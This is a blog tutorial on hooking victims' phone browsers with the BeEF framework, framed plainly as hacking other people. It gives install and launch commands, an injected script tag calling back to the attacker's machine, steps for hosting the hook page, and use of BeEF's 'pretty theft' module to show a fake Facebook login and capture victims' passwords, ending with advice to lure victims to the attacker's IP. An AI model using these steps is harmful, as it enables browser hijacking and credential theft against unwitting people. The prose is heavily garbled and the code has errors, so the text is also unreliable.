Hack AnyOne Phone Browser

 Hack AnyOne Phone Browser Using Xss (BeEF)


Hello everyone My Name is Tauqeer khan And in Today`s article I will tell you about Hack AnyOne Phone Browser Using Xss (BeEF)

Browser hack




today I am disclosing to you how to hack a program and access his all data utilizing XSS



  What is XSS? 

 Cross-site Scripting (XSS) is a customer-side code Injection Attack. The assailant plans to execute pernicious contents in an internet browser of the casualty by remembering vindictive code for a real site page or web application. The genuine assault happens when the casualty visits the site page or web application that executes the noxious code. The website page or web application turns into a vehicle to convey vindictive content to the client's program. Weak vehicles that are generally utilized for Cross-webpage Scripting assaults are gatherings, message sheets, and pages that permit remarks. 
A site page or web application is powerless against XSS on the off chance that it utilizes unsanitized client contribution to the yield that it produces. This client input should then be parsed by the casualty's program. XSS assaults are conceivable in VBScript, ActiveX, Flash, and even CSS. Notwithstanding, they are generally regular in JavaScript, principally in light of the fact that JavaScript is essential to most perusing encounters.

 How does XSS Work?


There are two phases to a regular XSS assault: 

To run malignant JavaScript code in a casualty's program, an aggressor should initially figure out how to infuse vindictive code (payload) into a site page that the casualty visits. 

From that point onward, the casualty should visit the page with the vindictive code. In the event that the assault is aimed at specific casualties, the assailant can utilize social designing or potentially phishing to send a pernicious URL to the person in question.

 1. Installation:-

 are you using kali Linux, parrot os, and arch os this beef-XSS tool is the default

 and you using other Linux and termux you can install using git

 git clone https://github.com/beefproject/beef.git 

 cd beef 

 ./install 

 after installing launch beef using the below command
 ./beef

   

  now BeEF XSS starts now Beef gives you Hook Url

 

 now copy the hook URL and paste it to your webpage in a script form

<script scr="http:192.168.1.12.4444/hook"></script>

  please Enter your Machine IP Address

 now Time to paste this Script in now go to the Kali Linux web directory 

 cd /var/www/html/

 nano index.html

  now paste the hook.js script in your HTML page and save it

  

  now start the apache2 server in your machine using the below command

 service apache2 start

 now your apache server is started

  1. open your browser and type your IP in the address bar

 

  now your web page is open using your IP 

 Now time to Control Browser open BEEF control panel in your Browser

 http://192.168.1.12:4444/ui/panel

 now your default user name and password is beef

  

  now login with username and password

 and see your browser is shown as hooked browser

 

 now go to the command area, now you can see a lot of hacking options available here

 

 now I can see a simple method

  now go to social engineering and click on pretty theft and execute it.

 

 now see in your apache webpage a Facebook login page is appear here

 

 now victim type it's email and password boom! you can see it on a beef panel on module result history 

 

 now it is not only a method to hack in beef many more options to hack.

 How to Hack Victim?


send your IP address to your casualty when it clicks on it he goes to your site page and you can snare it and 

hack it. 

Any issue remark here.

Post a Comment

0 Comments